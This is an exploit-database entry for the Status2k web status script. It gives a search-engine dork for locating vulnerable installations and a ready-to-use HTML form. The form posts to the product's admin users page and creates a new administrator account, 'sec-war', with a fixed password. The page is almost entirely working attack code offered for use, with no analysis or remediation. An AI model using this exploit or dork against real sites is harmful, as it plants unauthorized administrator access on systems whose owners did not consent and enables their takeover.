Status2k Remote Add Admin Exploit

2010-01-25T00:00:00
ID 1337DAY-ID-10721
Type zdt
Reporter alnjm33
Modified 2010-01-25T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================
Status2k Remote Add Admin Exploit
=================================

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : status2k Remote Add Admin Exploit
Author: alnjm33
Software Link: it cost 24.95 / y
Script Site : http://www.status2k.com/buynow.html
Version: 1
Tested on: Version 1
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
( allinurl:dynamicimg.php )
================================Exploit=============================================
 
<html>
<title>status2k Remote Add Admin</title>
 
<body link="#00FF00" text="#008000" bgcolor="#000000">
 
<form method="POST" action="http://server/Status2k/admin/options/users.php">
<input type="hidden" name="type" value="add">
<table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080">
<tr>
<td class="top">
<p align="center"><b>User & Pass : sec-war</b></p>
<p align="center"><b><font face="Comic Sans MS">
<a href="http://server/path//index.php?act=idx" style="text-decoration: none">
<font color="#00FF00">Security War</font></a></font></b></p>
<p align="center"><b>Username:</b></td>
</tr>
<tr>
<td height="1">
<p align="center"><input type="text" name="adminuser" size="30" value="sec-war"></td>
</tr>
<tr>
<td class="top">
<p align="center"><b>Password:</b></td>
</tr>
<tr>
 
<td height="22">
<p align="center">
<input type="password" name="adminpass" size="30" value="sec-war"></td>
</tr>
<tr>
<td align="right">
<p align="center">
<input type="submit" value="Add User >>" style="font-weight: 700"></td>
</tr>
</form>
</table>
</html>



#  0day.today [2018-02-16]  #